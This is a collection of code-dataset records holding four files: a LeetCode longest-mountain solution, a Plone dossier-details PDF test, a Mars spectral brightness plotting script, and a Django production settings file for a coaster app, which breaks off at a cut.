+{"seq_id":"156189338","text":"# @Time : 2020/10/25 23:53\n# @Author : LiuBin\n# @File : 845.py\n# @Description : \n# @Software: PyCharm\n\"\"\"Longest Mountain in Array\nApproach: DP, two pointers\n1. Scan once each for the longest ascending run and the longest descending run ending at the current element, then sum them to get the maximum\n2. Two pointers\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def longestMountain(self, A: List[int]) -> int:\n if len(A) < 3:\n return 0\n last = A[0]\n dp_pre = [0]\n for a in A:\n if a > last:\n dp_pre.append(dp_pre[-1] + 1)\n else:\n dp_pre.append(0)\n last = a\n last = A[-1]\n dp_post = [0]\n for a in A[::-1]:\n if a > last:\n dp_post.insert(0, dp_post[0] + 1)\n else:\n dp_post.insert(0, 0)\n last = a\n max_ = 0\n for pre, post in zip(dp_pre[1:], dp_post[:-1]):\n if pre and post:\n max_ = max(pre + post + 1, max_)\n return max_\n\n\nprint(Solution().longestMountain([2, 1, 4, 7, 3, 2, 5]))\n","sub_path":"leetcode/towpointer/845.py","file_name":"845.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"507275457","text":"from ftw.builder import Builder\nfrom ftw.builder import create\nfrom ftw.pdfgenerator.builder import Builder as PDFBuilder\nfrom ftw.pdfgenerator.interfaces import ILaTeXView\nfrom ftw.pdfgenerator.utils import 
provide_request_layer\nfrom ftw.testing import MockTestCase\nfrom opengever.dossier.behaviors.dossier import IDossierMarker\nfrom opengever.latex import dossierdetails\nfrom opengever.latex.dossierdetails import IDossierDetailsLayer\nfrom opengever.latex.layouts.default import DefaultLayout\nfrom opengever.latex.testing import LATEX_ZCML_LAYER\nfrom opengever.testing import FunctionalTestCase\nfrom opengever.testing import select_current_org_unit\nfrom plone.app.testing import TEST_USER_ID\nfrom zope.component import getMultiAdapter\nfrom zope.publisher.interfaces.browser import IDefaultBrowserLayer\nfrom ftw.testbrowser import browsing\n\n\nclass TestDossierDetailsPDFView(MockTestCase):\n\n layer = LATEX_ZCML_LAYER\n\n def test_is_registered(self):\n context = self.providing_stub([IDossierMarker])\n request = self.providing_stub([IDefaultBrowserLayer])\n\n self.replay()\n view = getMultiAdapter((context, request),\n name='pdf-dossier-details')\n\n self.assertTrue(isinstance(\n view, dossierdetails.DossierDetailsPDFView))\n\n def test_render_adds_browser_layer(self):\n context = request = self.create_dummy()\n\n view = self.mocker.patch(\n dossierdetails.DossierDetailsPDFView(context, request))\n\n self.expect(view.allow_alternate_output()).result(False)\n self.expect(view.export())\n\n self.replay()\n\n view.render()\n self.assertTrue(dossierdetails.IDossierDetailsLayer.providedBy(\n request))\n\n\nclass TestDossierDetails(FunctionalTestCase):\n use_default_fixture = False\n\n def setUp(self):\n super(TestDossierDetails, self).setUp()\n self.user = create(Builder('ogds_user')\n .having(firstname='t\\xc3\\xa4st'.decode('utf-8'),\n lastname=u'User'))\n self.admin_unit = create(Builder('admin_unit')\n .as_current_admin_unit()\n .having(title=u'Regierungsrat'))\n self.org_unit = create(Builder('org_unit')\n .having(title=u'Regierungsrat',\n admin_unit=self.admin_unit)\n .with_default_groups()\n .assign_users([self.user]))\n\n select_current_org_unit(self.org_unit.id())\n\n @browsing\n def test_dossierdetails_view(self, browser):\n repositoryroot = create(Builder('repository_root')\n .titled(u'Repository'))\n repository_1 = create(Builder('repository')\n .titled(u'Repository Folder')\n .within(repositoryroot))\n repository_1_1 = create(Builder('repository')\n .titled(u'Sub Repository Folder')\n .within(repository_1))\n dossier = create(Builder('dossier')\n .within(repository_1_1)\n .having(responsible=self.user.userid))\n create(Builder('task')\n .within(dossier)\n .having(responsible=self.user.userid,\n responsible_client=self.org_unit.id()))\n\n browser.login().visit(dossier, view='pdf-dossier-details')\n\n def get_dossierdetails_view(self, dossier):\n provide_request_layer(dossier.REQUEST, IDossierDetailsLayer)\n layout = DefaultLayout(dossier, dossier.REQUEST, PDFBuilder())\n return getMultiAdapter(\n (dossier, dossier.REQUEST, layout), ILaTeXView)\n\n def test_responsible_contains_admin_unit_and_userid(self):\n dossier = create(Builder('dossier')\n .having(responsible=TEST_USER_ID))\n\n dossierdetails = self.get_dossierdetails_view(dossier)\n self.assertEquals(\n 'Regierungsrat / User t\\xc3\\xa4st (test_user_1_)',\n dossierdetails.get_responsible().encode('utf-8'))\n\n def test_repository_path_is_a_reverted_path_seperated_with_slahes(self):\n repositoryroot = create(Builder('repository_root')\n .titled(u'Repository'))\n repository_1 = create(Builder('repository')\n .titled(u'Repository Folder')\n .within(repositoryroot))\n repository_1_1 = create(Builder('repository')\n .titled(u'Sub 
Repository Folder')\n .within(repository_1))\n dossier = create(Builder('dossier').within(repository_1_1))\n\n dossierdetails = self.get_dossierdetails_view(dossier)\n\n self.assertEquals(\n u'1.1. Sub Repository Folder / 1. Repository Folder',\n dossierdetails.get_repository_path())\n\n def test_repository_path_do_not_escape_special_latex_characters(self):\n \"\"\"The escaping is done by the `get_dossier_metadata` method\n and shouldn't be done twice.\"\"\"\n\n repofolder = create(Builder('repository')\n .titled(u'Foo & Bar'))\n\n dossier = create(Builder('dossier').within(repofolder))\n dossierdetails = self.get_dossierdetails_view(dossier)\n\n self.assertEquals(\n '1. Foo & Bar',\n dossierdetails.get_repository_path())\n","sub_path":"opengever/latex/tests/test_dossierdetails.py","file_name":"test_dossierdetails.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"175135007","text":"\"\"\"\nCreated on 2019-10-25\n\n@author: K. Masunaga, LASP CU Boulder (kei.masunaga@lasp.colorado.edu)\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom common.tools import AnchoredHScaleBar\n\nfrom HskClass import HskData, Img, Xslice, Yslice, CalData, HskHorizons, EuvStar\nfrom MyRc import HskRc\nrc = HskRc()\n\n\ndef get_date_acc(fnames):\n if type(fnames) is not list:\n fnames = [fnames]\n date_acc = ''\n for ifname in fnames:\n hskdat = HskData(ifname, open=False)\n date_acc += hskdat.date + ', '\n\n return date_acc\n\ndef qlplot_KAI(subdicAll, linename=None, save=False):\n dic_common = subdicAll['common']\n dic_linename = subdicAll[linename]\n dic_save_mode = subdicAll['save_mode']\n\n ## Load data from dictionary\n # number of data\n ndat, ndat_sky = dic_common['ndat'], dic_common['ndat_sky']\n if ndat_sky is None:\n dickey = 'ndat' + str(int(ndat)) + '_nsky' + str(ndat_sky)\n else:\n dickey = 'ndat' + str(int(ndat)) + '_nsky' + str(int(ndat_sky))\n\n # img objects\n img_mean = dic_linename['img_mean']\n img_sky_mean = dic_linename['img_sky_mean']\n img_sub = dic_linename['img_sub']\n # xslice objects\n xsl_mean = dic_linename['xslice_mean']\n xsl_sky_mean = dic_linename['xslice_sky']\n xsl_sub = dic_linename['xslice_sub']\n # yslice objects\n ysl_mean = dic_linename['yslice_mean']\n ysl_sky_mean = dic_linename['yslice_sky']\n ysl_sub = dic_linename['yslice_sub']\n # lim data\n wvlim_sl = dic_linename['wvlim_sl'] # [1056, 1076]#\n xlim_sl = dic_linename['xlim_sl'] # [433, 451]#\n ylim_sl = dic_linename['ylim_sl']\n ylim_adj = dic_linename['ylim_adj']\n ylim_away = dic_linename['ylim_away']\n\n br = dic_linename['I']\n br_err = dic_linename['I_err']\n\n # yfit model\n fitted_model = dic_linename['yfit_model']\n\n # misc items\n fname = dic_common['fname']\n date = get_date_acc(fname)\n target_body = dic_common['target_body']\n diam = dic_common['diam']\n npix_disk = dic_common['npix_disk']\n obs_period = dic_common['obs_period']\n period_str = '{:02}'.format(obs_period)\n xscl = 10\n yscl = 4.2\n\n with_sky = dic_save_mode['with_sky']\n mlt_date = dic_save_mode['mlt_date']\n adjust_bg = dic_save_mode['adjust_bg']\n flip_n_roll_sky = dic_save_mode['flip_n_roll_sky']\n # flip_n_roll_sky = False\n # define figure name\n figtit = target_body + '_' + date[:-2] + '\\n on_(' + str(ndat) + '), ' + 'off_(' + str(ndat_sky) + '), '\n\n ## set plot lim\n wvlim_plt = [500, 1500]#[wvlim_sl[0] - 50, wvlim_sl[1] + 50]\n ylim_plt = [500, 640]\n img_mean_max = 
np.max(img_mean.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]])\n if with_sky:\n img_max = np.max(abs(img_sub.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]))\n idx_cnts = np.where(abs(img_sub.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]) == img_max)\n else:\n img_max = np.max(abs(img_mean.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]))\n idx_cnts = np.where(abs(img_mean.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]) == img_max)\n ymax_cnts = idx_cnts[0][0] + ylim_sl[0]\n xmax_cnts = idx_cnts[1][0] + xlim_sl[0]\n wlmax_cnts = img_mean.xcal[xmax_cnts] # caldat.xcal[xmax_cnts]\n\n ## Start plotting ##\n plt.close()\n fig = plt.figure(figsize=[12.5, 10])\n widths = [3, 1]\n gs = fig.add_gridspec(5, 2, width_ratios=widths) # fig.add_gridspec(5, 2, height_ratios=heights)\n plt.subplots_adjust(hspace=0.5)\n\n ax1 = fig.add_subplot(gs[0, 0])\n img_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_mean.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n img_mean.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n img_mean.plot_hline(ylim_sl[0], color='r', linestyle='--')\n img_mean.plot_hline(ylim_sl[1], color='r', linestyle='--')\n ax1.set_xlim(wvlim_plt)\n ax1.set_ylim(ylim_plt)\n ax1.set_title(figtit)\n\n ax12 = fig.add_subplot(gs[0, 1])\n img_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, diam / xscl, diam / yscl, edgecolor='r', facecolor='None', lw=1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, 3 * diam / xscl, 3 * diam / yscl, edgecolor='r', facecolor='None',\n lw=1)\n ax12.set_xlim(wvlim_sl)\n ax12.set_ylim(ylim_sl)\n\n if with_sky or flip_n_roll_sky:\n ax2 = fig.add_subplot(gs[1, 0])\n img_sky_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_sky_mean.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n img_sky_mean.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n img_sky_mean.plot_hline(ylim_sl[0], color='r', linestyle='--')\n img_sky_mean.plot_hline(ylim_sl[1], color='r', linestyle='--')\n ax2.set_xlim(wvlim_plt)\n ax2.set_ylim(ylim_plt)\n\n ax22 = fig.add_subplot(gs[1, 1])\n img_sky_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, diam / xscl, diam / yscl, edgecolor='r', facecolor='None', lw=1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, 3 * diam / xscl, 3 * diam / yscl, edgecolor='r', facecolor='None',\n lw=1)\n ax22.set_xlim(wvlim_sl)\n ax22.set_ylim(ylim_sl)\n\n ax3 = fig.add_subplot(gs[2, 0])\n img_sub.plot(cmap='RdYlBu_r', vmin=-img_max * 1.1, vmax=img_max * 1.1)\n img_sub.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n img_sub.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n img_sub.plot_hline(ylim_sl[0], color='r', linestyle='--')\n img_sub.plot_hline(ylim_sl[1], color='r', linestyle='--')\n ax3.set_xlim(wvlim_plt)\n ax3.set_ylim(ylim_plt)\n\n ax32 = fig.add_subplot(gs[2, 1])\n img_sub.plot(cmap='RdYlBu_r', vmin=-img_max * 1.1, vmax=img_max * 1.1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, diam / xscl, diam / yscl, edgecolor='r', facecolor='None', lw=1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, 3 * diam / xscl, 3 * diam / yscl, edgecolor='r', facecolor='None',\n lw=1)\n ax32.set_xlim(wvlim_sl)\n ax32.set_ylim(ylim_sl)\n\n ## Plot xslice\n ax4 = fig.add_subplot(gs[3, :])\n xsl_mean.plot(color='C3', label='mars')\n ax4.set_xlim(wvlim_plt)\n ax4.set_ylim(-max(xsl_sky_mean.counts[xlim_sl[0]:xlim_sl[1]] * 1.2),\n max(xsl_mean.counts[xlim_sl[0]:xlim_sl[1]]) * 1.2)\n if adjust_bg:\n xsl_sky_mean.plot(color='C9', label='sky')\n else:\n 
xsl_sky_mean.plot(color='C0', label='sky')\n xsl_sub.plot(color='k', label='mars-sky')\n\n xsl_mean.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n xsl_mean.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n xsl_mean.plot_hline(0, color='grey', linewidth=1, linestyle=':')\n plt.legend(loc='upper right')\n ## Add a scale of the spectral resolution\n rsx = AnchoredHScaleBar(size=8, label=\"spectral resolution\", loc='upper left', frameon=False, pad=0, sep=4,\n color=\"k\", linewidth=0.8)\n ax4.add_artist(rsx)\n obx = AnchoredHScaleBar(size=diam / xscl, label=\"2 ${R_{M}}$\", loc='lower center', frameon=False, pad=0, sep=4,\n color=\"k\", linewidth=0.8)\n ax4.add_artist(obx)\n # ctools.copy_plot_width(ax1, ax4)\n\n ## Plot yslice\n ax5 = fig.add_subplot(gs[4, :])\n ysl_mean.plot(color='C3', label='mars')\n ax5.set_xlim(ylim_plt)\n if with_sky or flip_n_roll_sky:\n ax5.set_ylim(-max(ysl_sky_mean.counts[ylim_plt[0]:ylim_plt[1]] * 1.2),\n max(ysl_mean.counts[ylim_plt[0]:ylim_plt[1]]) * 1.2)\n else:\n ax5.set_ylim(-max(ysl_mean.counts[ylim_plt[0]:ylim_plt[1]] * 1.2 * 0.1),\n max(ysl_mean.counts[ylim_plt[0]:ylim_plt[1]]) * 1.2)\n ysl_mean.plot_vline(ylim_sl[0], color='r', linestyle='--')\n ysl_mean.plot_vline(ylim_sl[1], color='r', linestyle='--')\n\n if with_sky or flip_n_roll_sky:\n if adjust_bg:\n ysl_sky_mean.plot(color='C9', label='sky')\n else:\n ysl_sky_mean.plot(color='C0', label='sky')\n ysl_sub.plot(color='k', label='mars-sky')\n else:\n ysl_mean.plot_vline(ylim_away[0], color='C0', linestyle='--')\n ysl_mean.plot_vline(ylim_away[1], color='C0', linestyle='--')\n\n if adjust_bg:\n ysl_mean.plot_vline(ylim_adj[0], color='C9', linestyle='--')\n ysl_mean.plot_vline(ylim_adj[1], color='C9', linestyle='--')\n ysl_mean.plot_hline(0, color='grey', linewidth=1, linestyle=':')\n\n ## Overplot fitted model on the yslice\n if with_sky or flip_n_roll_sky:\n ycal = ysl_sub.ycal\n plt.plot(ycal, fitted_model(ycal), color='grey')\n plt.legend()\n plt.legend(loc='upper right')\n\n ## Add a scale of the pointing accuracy\n point_acc = 25\n rsy = AnchoredHScaleBar(size=point_acc / yscl, label=\"pointing accuracy\", loc='upper left', frameon=False, pad=0,\n sep=4, color=\"k\", linewidth=0.8)\n ax5.add_artist(rsy)\n oby = AnchoredHScaleBar(size=diam / yscl, label=\"2 ${R_{M}}$\", loc='lower center', frameon=False, pad=0, sep=4,\n color=\"k\", linewidth=0.8)\n ax5.add_artist(oby)\n\n ## Write brightness on the figure\n brightness_xslice = xsl_sub.get_brightness(xlim_sl, npix=np.ceil(npix_disk))\n # brightness_yslice = ysl_sub.get_brightness(ylim_sl, npix=np.ceil(npix_disk))\n fig = plt.gcf()\n ax_list = fig.axes\n xlim_xsl = ax_list[-2].get_xlim()\n ylim_xsl = ax_list[-2].get_ylim()\n # ax_list[-2].text(xlim_xsl[0]+3, (ylim_xsl[0]+ylim_xsl[1])/2, \"{:.2f}\".format(br) +'±' + \"{:.2f}\".format(br_err) + ' R' )\n ax_list[-2].text(xlim_xsl[0] + 3, (ylim_xsl[0] + ylim_xsl[1]) / 4,\n \"{:.2f}\".format(brightness_xslice[0]) + '±' + \"{:.2f}\".format(brightness_xslice[1]) + ' R')\n xlim_ysl = ax_list[-1].get_xlim()\n ylim_ysl = ax_list[-1].get_ylim()\n # ax_list[-1].text(xlim_ysl[0]+5, (ylim_ysl[0]+ylim_ysl[1])/2, \"{:.2f}\".format(br) +'±' + \"{:.2f}\".format(br_err) + ' R')\n # ax_list[-1].text(xlim_ysl[0]+5, (ylim_ysl[0]+ylim_ysl[1])/4, \"{:.2f}\".format(brightness_yslice[0]) +'±' + \"{:.2f}\".format(brightness_yslice[1]) + ' R')\n\n if with_sky:\n if mlt_date:\n if adjust_bg:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/mlt_date/adjust_bg/period_' + period_str + '/' + dickey + '/'\n 
os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_period_' + period_str + '_' + linename + '.png'\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/mlt_date/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_period_' + period_str + '_' + linename + '.png'\n else:\n if adjust_bg:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/daily/adjust_bg/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_' + date[:-2] + '_' + linename + '.png'\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/daily/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_' + date[:-2] + '_' + linename + '.png'\n else:\n if mlt_date:\n if flip_n_roll_sky:\n savepath = rc.saveloc + target_body + '/plot/brightness/no_sky/mlt_data/flip_n_roll_sky/period_' + period_str + '/' + dickey + '/'\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/no_sky/mlt_data/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_period_' + period_str + '_' + linename + '.png'\n\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/no_sky/daily/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_' + date[:-2] + '_' + linename + '.png'\n\n if save:\n plt.savefig(savepath + filename)\n\ndef qlplot_KAI_load(target_body, obs_period, linename, date_mean=None, with_sky=False, daily=False, mlt_date=False,\n adjust_bg=False, flip_n_roll_sky=False, pdf=False):\n period_str = '{:02}'.format(obs_period)\n\n if with_sky:\n if daily:\n if adjust_bg:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/daily/adjust_bg/period_' + period_str + '/'\n else:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/daily/normal/period_' + period_str + '/'\n savename = 'brightness_' + date_mean + '.npy'\n\n elif mlt_date:\n if adjust_bg:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/mlt_date/adjust_bg/period_' + period_str + '/'\n else:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/mlt_date/normal/period_' + period_str + '/'\n savename = 'brightness_mlt_date.npy'\n else:\n if daily:\n path = rc.saveloc + target_body + '/npy/brightness/no_sky/daily/normal/period_' + period_str + '/'\n savename = 'brightness_' + date_mean + '.npy'\n elif mlt_date:\n if flip_n_roll_sky:\n path = rc.saveloc + target_body + '/npy/brightness/no_sky/mlt_date/flip_n_roll_sky/period_' + period_str + '/'\n else:\n path = rc.saveloc + target_body + '/npy/brightness/no_sky/mlt_date/normal/period_' + period_str + '/'\n savename = 'brightness_mlt_date.npy'\n\n dic = np.load(path + savename, allow_pickle=True).item()\n key = list(dic.keys())[0]\n qlplot_KAI(dic[key], linename)\n\nif __name__ == '__main__':\n obs_period = 7\n linename = 'OI1304'\n with_sky = False\n mlt_date = True\n daily = False\n adjust_bg = False\n flip_n_roll_sky = False\n half_dist = False\n qlplot_KAI_load('mars', obs_period, linename, with_sky=with_sky, daily=daily, mlt_date=mlt_date,\n adjust_bg=adjust_bg, flip_n_roll_sky=flip_n_roll_sky, pdf=False)","sub_path":"test/test_plt_img_load.py","file_name":"test_plt_img_load.py","file_ext":"py","file_size_in_byte":14365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"643521703","text":"import os\nimport json\nfrom dotenv import load_dotenv\nimport environ\nload_dotenv()\n\n\nenv = environ.Env(\n # set casting, default value\n DEBUG=(bool, False)\n)\n\n# A list of all the people who get code error notifications. When DEBUG=False and AdminEmailHandler is configured in LOGGING (done by default), Django emails these people the details of exceptions raised in the request/response cycle.\n# ADMINS = [('Admin', 'quantum@admin.com'), ('Mary', 'mary@example.com')]\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nenviron.Env.read_env(os.path.join(BASE_DIR, '.env'))\n\nENVIRONMENT = 'production'\n\nSECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')\n\n\nDEBUG = False\n# from django.contrib.messages import constants as message_constants\n# MESSAGE_LEVEL = message_constants.DEBUG\n\nALLOWED_HOSTS = ['*']\n# ALLOWED_HOSTS = ['https://quantum-coasters.uc.r.appspot.com', 'https://api-dot-quantum-coasters.uc.r.appspot.com']\n\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'corsheaders',\n 'rest_framework',\n 'rest_framework.authtoken',\n 'rest_auth',\n 'rest_framework_jwt',\n 'rest_framework_jwt.blacklist',\n 'django.contrib.sites',\n 'rest_auth.registration',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n # Included providers for allauth\n # 'allauth.socialaccount.providers.auth0',\n 'social_django',\n 'django_filters',\n 'django.contrib.sessions.middleware',\n 'channels',\n 'quantumapi',\n 'quantumforum',\n 'quantumadminapp.apps.QuantumadminappConfig',\n # 'webpack_loader',\n]\n\n# Config/ routing for Websockets/ chat\nASGI_APPLICATION = \"quantumapp.asgi.application\"\n\nCHANNEL_LAYERS = {\n \"default\": {\n \"BACKEND\": \"channels_redis.core.RedisChannelLayer\",\n \"CONFIG\": {\n \"hosts\": [(\"127.0.0.1\", 6379)],\n },\n },\n}\n\n# WEBPACK_LOADER = {\n# 'DEFAULT': {\n# 'BUNDLE_DIR_NAME': '',\n# 'STATS_FILE': os.path.join(BASE_DIR, 'webpack-stats.json')\n# }\n# }\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.RemoteUserMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'social_django.middleware.SocialAuthExceptionMiddleware',\n 'django.contrib.sites.middleware.CurrentSiteMiddleware',\n]\n\n\nREST_FRAMEWORK = {\n 'DEFAULT_FILTER_BACKENDS': ['django_filters.rest_framework.DjangoFilterBackend'],\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.IsAuthenticated',\n ],\n # These are set globally, as the global authentication schemes. 
Can also set on a per view basis.\n # Using authentication_classes = [JSONWebTokenAuthentication]..etc...\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n 'rest_framework.authentication.BasicAuthentication',\n 'rest_framework.authentication.RemoteUserAuthentication',\n 'rest_framework_jwt.authentication.JSONWebTokenAuthentication',\n # 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n}\n\n# env variables sent through context to templates, redirect to Client React App URLS\nREACT_APP_FORUM_URL = os.environ.get('REACT_APP_FORUM_URL')\nREACT_APP_HOME = os.environ.get('REACT_APP_HOME')\nREACT_APP_USER_PROFILE = os.environ.get('REACT_APP_USER_PROFILE')\nCLIENT_URL = 'https://quantum-coasters.uc.r.appspot.com'\n\n# For if deployed to App Engine\nFORUM_URL = \"https://api-dot-quantum-coasters.uc.r.appspot.com/index\"\nADMIN_URL = \"https://api-dot-quantum-coasters.uc.r.appspot.com/quantumadmin/\"\n\n\n# Quantum API - Auth0 Credentials (Management API APP(Test Application))\nAUTH0_CLIENT_ID = os.environ.get('AUTH0_CLIENT_ID')\nAUTH0_DOMAIN = os.environ.get('AUTH0_DOMAIN')\nAUTH0_CLIENT_SECRET = os.environ.get('AUTH0_CLIENT_SECRET')\n\n# Quantum API\nAPI_IDENTIFIER = os.environ.get('API_IDENTIFIER')\nQUANTUM_COASTERS_API_ID = os.environ.get('QUANTUM_COASTERS_API_ID')\n\n\n# Management API\n# SCOPES = ['openid', 'profile', 'offline_access', 'name', 'given_name', 'family_name', 'nickname', 'email', 'email_verified', 'picture', 'created_at', 'identities', 'phone', 'address']\n# AUTH0_OPEN_ID_USERS_SERVER_URL = os.environ.get('AUTH0_OPEN_ID_USERS_SERVER_URL')\nAUTH0_OPEN_ID_SERVER_URL = os.environ.get('AUTH0_OPEN_ID_SERVER_URL')\nAUTH0_MANAGEMENT_API_ID = os.environ.get('AUTH0_MANAGEMENT_API_ID')\nMANAGEMENT_API_PAYLOAD = json.dumps({\n \"client_id\": os.environ.get('AUTH0_CLIENT_ID'),\n \"client_secret\": os.environ.get('AUTH0_CLIENT_SECRET'),\n \"audience\": os.environ.get('AUTH0_OPEN_ID_SERVER_URL'),\n \"grant_type\": \"client_credentials\"\n })\nMANAGEMENT_API_AUTHORIZATION_CODE = json.dumps({\n \"client_id\": os.environ.get('AUTH0_CLIENT_ID'),\n \"client_secret\": os.environ.get('AUTH0_CLIENT_SECRET'),\n \"audience\": os.environ.get('AUTH0_OPEN_ID_SERVER_URL'),\n \"grant_type\": \"authorization_code\"\n })\n\n\n# Auth0 Credentials for Quantum Application\nSOCIAL_AUTH_TRAILING_SLASH = False # Remove trailing slash from routes\nSOCIAL_AUTH_AUTH0_DOMAIN = os.environ.get('SOCIAL_AUTH_AUTH0_DOMAIN')\n\n# Quantum Coasters Key\nSOCIAL_AUTH_AUTH0_KEY = os.environ.get('SOCIAL_AUTH_AUTH0_KEY')\n\n# Quantum Coasters Secret\nSOCIAL_AUTH_AUTH0_SECRET = os.environ.get('SOCIAL_AUTH_AUTH0_SECRET')\nSOCIAL_AUTH_AUTH0_SCOPE = [\n 'openid',\n 'profile',\n 'email',\n]\n\n\n# For Testing, to persist session cookies between redirect when redirecting user from login page.\n# Set to false for dev on localhost\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = False\n# If this is set to True, the cookie will be marked as “secure”, which means browsers may ensure that the cookie is only sent with an HTTPS connection\n# CSRF_COOKIE_HTTPONLY = False\n\n# https://docs.djangoproject.com/en/3.2/ref/settings/#session-cookie-domain\nSESSION_COOKIE_DOMAIN = \"appspot.com\"\n# Whether to store the CSRF token in the user’s session instead of in a cookie. 
It requires the use of django.contrib.sessions\nCSRF_USE_SESSIONS = False\nSESSION_SAVE_EVERY_REQUEST = True\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\nSESSION_COOKIE_SECURE = True\n\n# # Use with Ngnix configuration\n# SOCIAL_AUTH_REDIRECT_IS_HTTPS = True\n\n# https://docs.djangoproject.com/en/3.2/ref/contrib/sites/#module-django.contrib.sites\nSITE_ID = 1\n\n\nAUTH_USER_MODEL = 'quantumapi.User'\n\nJWT_AUTH = {\n 'JWT_PAYLOAD_GET_USERNAME_HANDLER':\n 'quantumapi.utils.jwt_get_username_from_payload_handler',\n 'JWT_DECODE_HANDLER':\n 'quantumapi.utils.jwt_decode_token',\n 'JWT_ALGORITHM': 'RS256',\n 'JWT_AUDIENCE': API_IDENTIFIER,\n 'JWT_ISSUER': os.environ.get('JWT_ISSUER'),\n 'JWT_AUTH_HEADER_PREFIX': 'Bearer',\n}\n\n\nAUTHENTICATION_BACKENDS = (\n 'social_core.backends.open_id.OpenIdAuth',\n 'quantumapi.auth0_backend.Auth0',\n 'django.contrib.auth.backends.RemoteUserBackend',\n 'quantumapi.auth0_backend.QuantumAdminOpenID',\n # Take into account that backends must be defined in AUTHENTICATION_BACKENDS or Django won’t pick them when trying to authenticate the user.\n 'social_core.backends.google_openidconnect.GoogleOpenIdConnect',\n 'social_core.backends.google.GoogleOAuth2',\n 'social_core.backends.google.GoogleOAuth',\n # 'social_core.backends.open_id_connect.OpenIdConnectAuth'\n\n # `allauth` specific authentication methods, such as login by e-mail\n # 'allauth.account.auth_backends.AuthenticationBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nROOT_URLCONF = 'quantumapp.urls'\n\n# from corsheaders.defaults import default_headers\n# CORS_ALLOW_HEADERS = default_headers + (\n# 'Access-Control-Allow-Origin',\n# )\n\n# CORS_ORIGIN_WHITELIST = (\n# 'https://quantum-coasters.uc.r.appspot.com',\n# 'https://api-dot-quantum-coasters.uc.r.appspot.com',\n# 'https://quantum-coasters.uc.r.appspot.com/',\n# 'https://api-dot-quantum-coasters.uc.r.appspot.com/',\n# )\n\nCORS_ALLOWED_ORIGINS = [\n 'http://127.0.0.1:3000',\n 'http://localhost:3000',\n 'http://localhost:8000',\n 'http://127.0.0.1:8000',\n 'https://quantum-coasters.uc.r.appspot.com',\n 'https://api-dot-quantum-coasters.uc.r.appspot.com',\n]\n\n# To allow some domains to make 